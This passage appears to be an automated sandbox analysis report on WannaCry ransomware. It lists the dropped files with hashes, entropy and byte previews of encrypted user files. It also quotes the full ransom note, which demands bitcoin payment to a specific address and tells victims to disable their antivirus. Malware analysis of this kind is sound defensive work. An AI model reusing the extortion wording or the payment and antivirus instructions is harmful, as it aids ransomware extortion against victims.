                                                  Preview:WANACRY!....1"z+88{...{..h.~....co..e=2.9/..x..9.8fdf.~;..l<..w.M...v&.0....D7,..$..%5%.;......?....%.l.....#...].[.&.Vo.C^.nTl...2..{.x..=....9..l2.z...\..?...W..oXGgf..P......<..^.N...4%i...R..7y.zf..t.. G....R..S.g.....x.I..Pm.TY&....Q..;...Kx..@_H?...!............h.j]}f|....8^]n.g.M........?...0B..3.H.....,..J.....\..&......!-.\(...W8.Q.&..b\.j.1K.*).O...`....h..4.G....h.p.hM.G..........W5..qL.;b.......b....u1X3~..e..=..Xu...:....uy_..r....x..x...g.5...8|........VQ..~.,.h...Ob...>..%.x..$.1...S|@.z.E..eD.Y........H....o"d..1.D.9..3(..c...o.w.@..~;..z...!..>r>..q..!......q.U..A....Xp.......$........H...........}.}IY.$D..........<8P.~.A.~X.....I3j.C......._...(.+....9...1..;>v....rX]..:...k..?c..M+a.r.D....P..cb..s.........I..n..3..;_5.........G.b?.HG..9.6.R:.....N...}/.........n*.s+5.VT..@..l;yaNj..kW...uo...Y..wq<._;.P....y&.yI.......>d..\"V..T*.M..1#.`.7.{$.+b81@n.l".1gc.."'g..s.0..<".......URf.....p........o..S..W.RjO..

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\NVWZAPQSQL.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831720836354265
                                                  Encrypted:false
                                                  SSDEEP:24:ZNqn+lAhDjREqYaTNU3p1vrCzDFMbEBlfLCywV:ZNq+lAh+WNwX+zcUfC
                                                  MD5:55AE23E68D6F22E5FACA6ED02E836423
                                                  SHA1:21B82521502F823F51B2FBB2695D5DD61484EA23
                                                  SHA-256:E384563E3B32DD41292BEE955F21D777A45210D1CFCE7D5FE246BD67ECCC36F5
                                                  SHA-512:63AA5186AEC08D657735ECC743EEF9F68CCAB22E355EB2490958C64FBBCD564622366D0614AA1E1E96CDD943628A12239F75568CAD68C917057CB6C9EBE6469D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:A....u.._3.!,N....g5..F..HU...m....Q.u.t.\U...nXg....w....j..fw:?Y..<'qu..@....H.i.*C...A...........m...2mZ]..4Ce._jX'>).#Cn(..Y....m.{..iBI<Lf.........+...15.p....b........g..c.......2.....f...u.Z..D...|..C....v.....qYU.....B.....2...K_.._u..X+DF....Cm./5.}.).....1F'.}x..U@.ei..w#t.......9....k.qm..*.u3....fz ...J.=c..@.c..j{@}m..p..@.w_.._Y9P.Hv............wy..Z...O..../.gs......y..$..:T...r.....a%2.&..0J.D..{~.E...".B.r....,.1)gy..7.....~.[......./....k.......!.Ju.;..-.h".>..6.W..(i#.4h.....%.Oe..YxW%\..k..7P.o...2....J......|X.rO#....p..0...*.*tF....... ..Im~.([....RQ..".`.L.<.....L...0..o....:.......W...a.rF.+.+..;..B.xa..`...........0....h/....#.>......G..i....fy.pQn.M.........M{.....lh'.`G..,..P...........T.]h..P...7.4>p...[V..&.7W.N.....:.h0.....fe.=E..PS.8%..Lb.0V?blE......A&.G/[.D.{.r.DJ.w.W..Mj....6.......X....S0N......rA.....&.Y.DK.8...7..Q.nnA.Oc.......0.....;b;...P.F =t`...EJ^....f.......m7{.e.</.... }.....b~..p`....$!..0..

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\NVWZAPQSQL.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842427789237601
                                                  Encrypted:false
                                                  SSDEEP:24:bkEew4gqCLGCJWkzICLMEhQZ/NwPZVCpiXaqVcwH1erebmZc0VUSjQJ7kfX653yA:bkvbgqCLoWQVyxGqVZHoZhHYofKZT
                                                  MD5:8B598DA7992C0344FDD0BE95FAA993D3
                                                  SHA1:E8472965D34A663CB193AFF25A78DD0218D52977
                                                  SHA-256:5D499AF44E33D8B2F9EDD41C5BC1D2CB203290C191D09C4F2394B149A3737186
                                                  SHA-512:4404555DB3024AD9695202A23B93CF8ADC6D82D650D56EBFE10F286A8695FC2592ED3CAFB8B88E54E9C2A922D5D77FEA1D80A9A3F71BE42AB5581A72D5A74281
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R..$K..u....z..;.X...??... ......B2...@....J..........2....eb0.../[.":..CX...L.k........L.M...D?El.f.g..@^.o..l..Km....9(r..L..XD$...........X.&r1...q..8..:.3..-.(y:x.=3#.....OP..R7....w..(.H..$'...N..+v.y........f....9.n......T.J4h.WN...3.2.0H...................p&...v.....w.Z.X..x.d.....+[..b......YE_w...F..D...5.R.L.._..).6N.N1...C.h.7.N.8.......O/c..9....%...\.wMdiWJ_.a.S.4..j.`@....4......mu..B.s.+.n..z....2.#C.. ..m7...`(..M....FP..ZP.,.(.....v.\...!.o..2..E...7...=....#/...q.....m7....=...Z..1..#E...Q|E..@..k.68^...`q.R'..\...2B..0q.d..,.tb.@..T.h^....n...2zZo..h.P...f5...n.r.5.q....4.7...{.v..+...u....=o....t/..]a.K..:...e.gv%....m.A..".x.eQ..cm....q....V.L].&.F.....EGX.|M-"".d..a.'..g.N6R.9...M.....r$.....R...[g<....cT+..._..T.U.".....A#.q).<...41...K/..N...).....f4.i.l,6....x..[.......qu.e.O_Z...C..w(.b!!..k.Z+..............KO..OY...~. .L.....n.?...+.....i+.. ...=gm...!.g.....d...y......z....:. .]....Mh.. .....N).

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\NVWZAPQSQL.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842427789237601
                                                  Encrypted:false
                                                  SSDEEP:24:bkEew4gqCLGCJWkzICLMEhQZ/NwPZVCpiXaqVcwH1erebmZc0VUSjQJ7kfX653yA:bkvbgqCLoWQVyxGqVZHoZhHYofKZT
                                                  MD5:8B598DA7992C0344FDD0BE95FAA993D3
                                                  SHA1:E8472965D34A663CB193AFF25A78DD0218D52977
                                                  SHA-256:5D499AF44E33D8B2F9EDD41C5BC1D2CB203290C191D09C4F2394B149A3737186
                                                  SHA-512:4404555DB3024AD9695202A23B93CF8ADC6D82D650D56EBFE10F286A8695FC2592ED3CAFB8B88E54E9C2A922D5D77FEA1D80A9A3F71BE42AB5581A72D5A74281
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....R..$K..u....z..;.X...??... ......B2...@....J..........2....eb0.../[.":..CX...L.k........L.M...D?El.f.g..@^.o..l..Km....9(r..L..XD$...........X.&r1...q..8..:.3..-.(y:x.=3#.....OP..R7....w..(.H..$'...N..+v.y........f....9.n......T.J4h.WN...3.2.0H...................p&...v.....w.Z.X..x.d.....+[..b......YE_w...F..D...5.R.L.._..).6N.N1...C.h.7.N.8.......O/c..9....%...\.wMdiWJ_.a.S.4..j.`@....4......mu..B.s.+.n..z....2.#C.. ..m7...`(..M....FP..ZP.,.(.....v.\...!.o..2..E...7...=....#/...q.....m7....=...Z..1..#E...Q|E..@..k.68^...`q.R'..\...2B..0q.d..,.tb.@..T.h^....n...2zZo..h.P...f5...n.r.5.q....4.7...{.v..+...u....=o....t/..]a.K..:...e.gv%....m.A..".x.eQ..cm....q....V.L].&.F.....EGX.|M-"".d..a.'..g.N6R.9...M.....r$.....R...[g<....cT+..._..T.U.".....A#.q).<...41...K/..N...).....f4.i.l,6....x..[.......qu.e.O_Z...C..w(.b!!..k.Z+..............KO..OY...~. .L.....n.?...+.....i+.. ...=gm...!.g.....d...y......z....:. .]....Mh.. .....N).

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\PIVFAGEAAV.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7961263472074664
                                                  Encrypted:false
                                                  SSDEEP:24:Ce51nCWS9SPYsPc9omlxW9EyG2reA7Ot7+rgPYJ/XNKCq:Ce5FE9SPa9omlxiGoeeE7Wmk/XNKCq
                                                  MD5:8C7FB12B707DFCC496C3507094BE39E4
                                                  SHA1:0AF7FC86A197A245288AF9897C0BA013435F2DCD
                                                  SHA-256:96084946E8B279BE7B63E9EF60259675B778E16871874C43AECFDA10A7CC3CC4
                                                  SHA-512:C1449584DECF13A5A2FA369ADD8034EC96E4C2338DCFE6BE4708D774C913B1600F59DDF541CB3E9699DEFBD354136CF340702E284AF464177C83456BA3742CE3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:.....K(.....O.'1h.E..I.`..lkNy..'s4.f.\..;........D1.......{...u$Pcs.K.D..........r..:}....@....s..........-..E..;..oC....A"..U..dF_!!-?.lg._.r...H..QG....J.K.....L;..>9..C..W..=O....9.A...g,s..4..xPa...)..O..X.1q.%....h...Z.!.........`..bt...N.._/.1.4..A.O.z.@.|.@.Q...S,W...'......{. .' =....p.'.j.._.4..@.....|8.U.d..u.|.N....93.....G....H......c.2|..Z..^....IC.Lj..K&.[.'.....\......|.sf..up....XZ.Q.U.....`j..!..q*2....o..0\[.>.C......q..F.HO.......;..I..d.C.HME....~4..T.'....0.IW,..S....j..._.het....b.;.......!S...|)E.~{.9...~C.v..D..nm.....T.F...;...Ufz.f..........b..".......z..i.}T..[z.S.L..G$...CY.....5..A.'.p..Z6.d$.6.od..........e........,.#a.).8k.].Xq2}.....dGM(6.!k. ..;+.E..MJe>"....1.n.E..W.sb.du.1..j.p. ..D.G..W.h......f..Z...D..k....p.-.Lv.....7dd..`LF-.} .h...n.!lX..-...-0...i.4E...$t..<vs`..f.7AG.&......."Xo.7..6,..=..Y.P.q`..8...v... ...1.....................>.M'$.Zt......*..!..o..yg...1.r.d\..re...`...m....w..GQ.\t.

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\PIVFAGEAAV.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8369908029718856
                                                  Encrypted:false
                                                  SSDEEP:24:bk3bjsXvwZKQW60dz/msaY1RGWt72B1j7thjg2HCOT/4XxepyxbCCDI5r+bqRngc:bkns/w0Qf0TvnGWtqDjJhje/xepyxbCZ
                                                  MD5:6BEF66E02511B84A0A25823611A88F40
                                                  SHA1:97F2DBEAB29D81DA67CAA0524C9DD4BCF4239460
                                                  SHA-256:8DA21A4531CF24D1C862C7F6D2A3B9BBBD53A9FD726B6CF5A48DCA77EAC9BCF0
                                                  SHA-512:F123968F6AE18C58B3247B2BCA456A742F7E575A3E8356ECC66A81A93E42974AB13C54D20B9B930E9117F2D6978A8E23B4758C70CF0D157865252A27869224C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..........H.Oq&..ca.g..._Z...S~.7..E.O.I8.o.R<.V......M..^.@V?f15........C.8...f...qY.-.^.c..].?xb.H..A>...t.%..F......J...Y.T...T5..Az_j.?...[.X{...p..7....\54>F.3.Q@bWv|....q..........7....H...:.Y.Sd..I9....+.jz...k.....C..R.aq)1.u.o.''n|[.n............GJ..SO.XX..\.h)`i .......S.H....s...y+...wu..?.EMs_..9.K..e...^...`..uiV...?....Y.Rxc".;...'t..Q#. .U.`..6@..F......D.....x.T...Gb..G..C1.e....p...A..i....M;sw.......+......5..j...t.-..?....2z7.Y.j|Y".R.mb>nq.$..Tl.HG?..7.T....a.......L..&...._Y.E..$..T......Z"..j_pH=Uc.1..*....."(.....}.J..H0....i1G.......S.U..J...JA=.v..6..^.k..r..V.5Z.?....&h..&qtT.zj[..~..{.6.$. .Ra..]21.i..........Q.......@..k.?..z'n..c-.q.:..n.,....8..P.. >.......x_..r1.-zx4.<~.HK...]..y.Sl..PQFT......kUw..........Y..s.'.HiK._."._.n~.5l...Yu.....b...37+mj..*..2..*mE...:.\.n.X.!....."S.i.p...X..<.j.t..2Y.h.l.m7..v&.]..!P.......~.4...../....X}....!{AH....0..>c.4.s.]..S5.5.....tb..7Su...?..B....=p..4..^

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\PIVFAGEAAV.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8369908029718856
                                                  Encrypted:false
                                                  SSDEEP:24:bk3bjsXvwZKQW60dz/msaY1RGWt72B1j7thjg2HCOT/4XxepyxbCCDI5r+bqRngc:bkns/w0Qf0TvnGWtqDjJhje/xepyxbCZ
                                                  MD5:6BEF66E02511B84A0A25823611A88F40
                                                  SHA1:97F2DBEAB29D81DA67CAA0524C9DD4BCF4239460
                                                  SHA-256:8DA21A4531CF24D1C862C7F6D2A3B9BBBD53A9FD726B6CF5A48DCA77EAC9BCF0
                                                  SHA-512:F123968F6AE18C58B3247B2BCA456A742F7E575A3E8356ECC66A81A93E42974AB13C54D20B9B930E9117F2D6978A8E23B4758C70CF0D157865252A27869224C4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!..........H.Oq&..ca.g..._Z...S~.7..E.O.I8.o.R<.V......M..^.@V?f15........C.8...f...qY.-.^.c..].?xb.H..A>...t.%..F......J...Y.T...T5..Az_j.?...[.X{...p..7....\54>F.3.Q@bWv|....q..........7....H...:.Y.Sd..I9....+.jz...k.....C..R.aq)1.u.o.''n|[.n............GJ..SO.XX..\.h)`i .......S.H....s...y+...wu..?.EMs_..9.K..e...^...`..uiV...?....Y.Rxc".;...'t..Q#. .U.`..6@..F......D.....x.T...Gb..G..C1.e....p...A..i....M;sw.......+......5..j...t.-..?....2z7.Y.j|Y".R.mb>nq.$..Tl.HG?..7.T....a.......L..&...._Y.E..$..T......Z"..j_pH=Uc.1..*....."(.....}.J..H0....i1G.......S.U..J...JA=.v..6..^.k..r..V.5Z.?....&h..&qtT.zj[..~..{.6.$. .Ra..]21.i..........Q.......@..k.?..z'n..c-.q.:..n.,....8..P.. >.......x_..r1.-zx4.<~.HK...]..y.Sl..PQFT......kUw..........Y..s.'.HiK._."._.n~.5l...Yu.....b...37+mj..*..2..*mE...:.\.n.X.!....."S.i.p...X..<.j.t..2Y.h.l.m7..v&.]..!P.......~.4...../....X}....!{AH....0..>c.4.s.]..S5.5.....tb..7Su...?..B....=p..4..^

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\PWCCAWLGRE.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.815272944964872
                                                  Encrypted:false
                                                  SSDEEP:24:zrwMCRVF48QfvYOHYpHSqBNTvTHElsgoqC0bkgTBnbK7qMQcDpdC:ztCuSLpHSW1THElsgDC4hTI7Hpc
                                                  MD5:248180BC7BCFB10B9C6F4DC1DC519C34
                                                  SHA1:73802AD9180A4428A1012149396A00734296BACF
                                                  SHA-256:2F2F04B235F7F07F480B6669708D4614FA4AB6D47BF1E5D400B5B750227FCDA7
                                                  SHA-512:5AC672AE6C4249F1FF526D01B1832AB2D61B9B7C43AC1C1D8C32D6B0256C1CD5F0CAC80250B0D53E2E0D6E2B13D6DF91A0BB9B930D3A481A97114E473A7BD15D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:a...T...g|{..X..|Q.*.*.p..7..|.P..%)..f.7.+bsO..rH\....5.....aK.O...1....=.&.l......S%eq........_.|E.D.b....@7..u..\........HR.K.x.P.+.a..9...W.^AS.:.te.....(26....B.A.2\..~HW..@.Kc..C./..S$L..EH...X..6O.......b]XL..O...M#..F<..1..."Wb...b..3.J..3..(.0..O...UV).R..j|.o.!..]j...L1.B...........Xh..I..&].f.4..t.F4.....v|..}..{......../....|...2.|...2y:.$.A.m.....V.d<f;>...9....;.f...3h?ae..i ..Y.`p{.OBn..G...\.v\.....M....5....m.9d.Bl........*....NO..f......7).......t*.*.....2#_FG.w.1i..*./.B..r.c.h...H...Hky.._....SDi...>.T}(.q...?._.*...I&.....#..2..s..g..=.7.{P.R.9p......e..K...2.S....^i.X.(R.... U+.(`.4.RT.Iw..bh.R6...5-.......S>-...0\d>...{....,G.zA.=...G._^io$,.7H:..b8) .+.J_.s..S...k.!.d.Q...5.....u...Q...y.<h..FZ.-8.\....}..e.......nE..0.|...".......>..x.ox&+...+.jh..(....eHQ.....[.4....7.....^(........>......V8..~....Z.~.kt.......[ux..=..(.%B..H.r..f...n...1f..?Qh..l.h..tj.&"};..0..p.....e.C.....z.Q.*.....e;WTa[...;..|...-T(.S....!......

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\PWCCAWLGRE.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8600995134419085
                                                  Encrypted:false
                                                  SSDEEP:24:bkgP7AkxPlvL6jMumO8+AGDbXq1ojOkfmAzFfmrULKZOEEh7Z:bkoPZit58H4q1oydgFfmrUvEEdZ
                                                  MD5:E00BD4909FF1AD2FC59C0DD26B700834
                                                  SHA1:8CCEDE3B188F88948F53250DA981502866CF2388
                                                  SHA-256:0908A18387A1815F536247CF79D03D476972AF759C03F13351C4F92447CCC3AE
                                                  SHA-512:61276B0AA4F245BE6CF7B908C1A1C8E1488855129B1B02ABF2AC4E33664CA25B72043185AFDCECD11632098874336B08AFFE945FF94A5643A77C4F6CC9EB4F87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....(.p..=#l6..dT...<...../&G/B#."o....1.{..3.4..j..t0...Q.X5I.k._.aU....k..kY...+..F.-^_.vxY....4u...+*~^+z.G....IZ....PL.$O..<#......%..KU..X!....g:k.,.d...DA5..}......Q...X.Y.4.P..$..ID.y.:.Z.r........A....E.=).m(O. |......h...B.K.:.cN.I>.............JZ..~.I......9P.Ofg..B..0.X.j.....~.&pKqg.. q.E......a/......4&.e..k.$...A.{c.O...p.....~w....PJ..S..........i..z...N.,.=.u.h..FM.Gr.+T.....1O.i.*...M..e.....x.Y..h...?8.(SWq...~.&.YUy...I..|2.4....o.(..e....-.c.s~.7... ..u...9Onj..0....-..!!....R.........V....!.Z...Q.%?..I........V.e.~b...^.-Zk....L...D].xj..U.X.p.....a.B.R...C.X........-G.z.:.zm.A.bE.....OL.E;......x.....K....Y.8K|&.....K-9=..[.=.N$.A.KoV...._)}.F`.Ry.K....Y.'.6.jF...._.$P......m;xR.j&...|.....P}...m[.3.Y\O...7......9n..2.TG.qu.0..h.../....H.^....#.r..q.k..NS.C.`..L....i.n..]ui_.Q.3..|...I.s.l.H......{.L:A}....$...6...i..=.F@Q_...Ry..8......j..(Q!....e....[*....'...j~3,..(....1%.+6..hl=f4.L..,..O.T."..".V.q.h....

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\PWCCAWLGRE.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8600995134419085
                                                  Encrypted:false
                                                  SSDEEP:24:bkgP7AkxPlvL6jMumO8+AGDbXq1ojOkfmAzFfmrULKZOEEh7Z:bkoPZit58H4q1oydgFfmrUvEEdZ
                                                  MD5:E00BD4909FF1AD2FC59C0DD26B700834
                                                  SHA1:8CCEDE3B188F88948F53250DA981502866CF2388
                                                  SHA-256:0908A18387A1815F536247CF79D03D476972AF759C03F13351C4F92447CCC3AE
                                                  SHA-512:61276B0AA4F245BE6CF7B908C1A1C8E1488855129B1B02ABF2AC4E33664CA25B72043185AFDCECD11632098874336B08AFFE945FF94A5643A77C4F6CC9EB4F87
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....(.p..=#l6..dT...<...../&G/B#."o....1.{..3.4..j..t0...Q.X5I.k._.aU....k..kY...+..F.-^_.vxY....4u...+*~^+z.G....IZ....PL.$O..<#......%..KU..X!....g:k.,.d...DA5..}......Q...X.Y.4.P..$..ID.y.:.Z.r........A....E.=).m(O. |......h...B.K.:.cN.I>.............JZ..~.I......9P.Ofg..B..0.X.j.....~.&pKqg.. q.E......a/......4&.e..k.$...A.{c.O...p.....~w....PJ..S..........i..z...N.,.=.u.h..FM.Gr.+T.....1O.i.*...M..e.....x.Y..h...?8.(SWq...~.&.YUy...I..|2.4....o.(..e....-.c.s~.7... ..u...9Onj..0....-..!!....R.........V....!.Z...Q.%?..I........V.e.~b...^.-Zk....L...D].xj..U.X.p.....a.B.R...C.X........-G.z.:.zm.A.bE.....OL.E;......x.....K....Y.8K|&.....K-9=..[.=.N$.A.KoV...._)}.F`.Ry.K....Y.'.6.jF...._.$P......m;xR.j&...|.....P}...m[.3.Y\O...7......9n..2.TG.qu.0..h.../....H.^....#.r..q.k..NS.C.`..L....i.n..]ui_.Q.3..|...I.s.l.H......{.L:A}....$...6...i..=.F@Q_...Ry..8......j..(Q!....e....[*....'...j~3,..(....1%.+6..hl=f4.L..,..O.T."..".V.q.h....

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.7895203033273255
                                                  Encrypted:false
                                                  SSDEEP:24:wqNfV0ao+XsxRXMXwZH672c0y36ux24teSX5:b1X8KXwH6770y36A5
                                                  MD5:3A11AAF3B4B679AF1E85DA0196957B16
                                                  SHA1:CDD5A152F8DE1E9A90D3B79EF7872391677C97FC
                                                  SHA-256:9F6C5E43BC070798A6EB059578BD45A72B77EEF9B7648F80F70AF1580090C515
                                                  SHA-512:57717C0325140F0C21C0EA2A937329EB6F9CC171C785B8C61277AC5F7AAC6C3579051CB9569192B33A10F625230808B7826E7AA62D3CA8B124A8F47EE019A65A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:[*..n;.. H..*..h5.T..t.3W[..@..].r.P;A..duF..+M.8...W.q -F.Dy-E.K.*........I........(34.l.v.Rt...v.!.....Rf.......#......?I.s...|.7...3....r.|J..=..V5._...Nk.BPb..~.)M.R..yaU.#..B...^$q.{.@1...5R.*tg.......s66...0.n0Fbc...]..?..t.:.......qb{....evB. z..:.o..d{[g...?.^..Bufy..llj.E.c.:/..tU...^.F.)...Z.#S]Z..mj...x#x.......4...n.*Zp].3.l6....f......Jt9...a...`..^.{AH....|$.Ao....H.`..GF.....$.|..Z.<U<._.:..dEQ9..S.1_2......7..O..X...A...(vO.#.....kR.X<....y%....8Of...+....5...7M4.........=N..|N`.|]]7G...D^...VYR...Y.Z....?3.....*.K|\w\....o..M..-.....q.?.*....!.j...!..'...l..r.DM.>.....Qt.2...(t.yG@..V|.\<........x..t.j..j..*...:F...k6........{.1.-..j....K#....JU.......Z..}.N..Eh^.\8Zm).......K.1F ........F*<l.v...rSQ.%3......o.Z8Fd9R............s(....y?.s4..T...z....0....G..F../..."Z+....7K..f.G..B<u..`U...K=..........2!.i....~2rR.+x.M..KV..:......n/.V*....1....p.nIO.....]`4.03.$.4[a(...f:IAC.&..Bg..-#.......\W..n.3h?....Q.WF..q@{........R}....

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.850870884047023
                                                  Encrypted:false
                                                  SSDEEP:24:bkUso+wfD/rdzk7b22jYCuoA0ty+iAwvYCk4xu81TmhFpsse4e6Fi:bkUJ+wZubJVtyRGeuayWs5e6w
                                                  MD5:A4EEA8E89E29E8AD13C5223A81BAF812
                                                  SHA1:37C0FF660F100E916DC45A7E582EB3D59B7C40BA
                                                  SHA-256:F1A848B1F6594FD1A7D4EE0F8856970773EA7B2C9B22A2B719F3EB1BE41D5159
                                                  SHA-512:E4AA8948F8F968B2A259F23DEE9E21EF4A064EB0B9AABD962109D76DE01E406B5865A3EF4EFB1171CFC465E9A37B3093CE0889AD6740504017EC7227088D23E8
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........T.:..-.hL..+f.....l...=.s9.5.......*..3C..?........;.Y..p.Xah.}M...4.e.z...j..B\cz.u+i...=.....G4e....z(...C...:./.....:dNC[....#.=kB.-..(.J`.N..]..E%.,.vD.>K.=`.rQ1...{B...N...d..0.u.....aT.#..C.^.}...0B8..b.s.6......o..,.|+..F.D.#...,...............;.I..I....n..Rau.8.d.u...!K.P..z..-.0=3.:.._..U%8>S..S0%.sp..a.b..,DF...2.....d......#......w7n...Q..s.+qr... +.(...`.r+._...1..9....x..]..5m!l...J=..p....s.p+.YY.,LkjWe....P....\x.."..*.f.=a..2........DH....u.e....K%.P.Ep."%....pj.V.....w1.kN....g....[...a....6..H..p...u.F^2S....,D.6......v..r).l-\!..C.....;XW3!.^{..h....],.>...bd..Q.J..h......I&.xR..8.V=....t.uA..y......|s.$.W=..e2.....<h1..TP[.6..&Q..`N...K..msg..H.@.N.{..+.N]5.V.6..p7~.{[.l.u.S.e..4.g>.....Lc!.(.._2<.-..9.:n..;X.?l............*;..h.WX.^...w....3yJ/....!..^...sQs..(.....l..jp*R..`x.m[E.m.$...yg^... ....g;..LW.8}.k5$..............m.y.t..p....q71B..f.).q....bu2'at!...#.N..O.+........(z.....\..._.(..!.,^*........

                                                  C:\Users\user\Desktop\ZQIXMVQGAH\QNCYCDFIJJ.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.850870884047023
                                                  Encrypted:false
                                                  SSDEEP:24:bkUso+wfD/rdzk7b22jYCuoA0ty+iAwvYCk4xu81TmhFpsse4e6Fi:bkUJ+wZubJVtyRGeuayWs5e6w
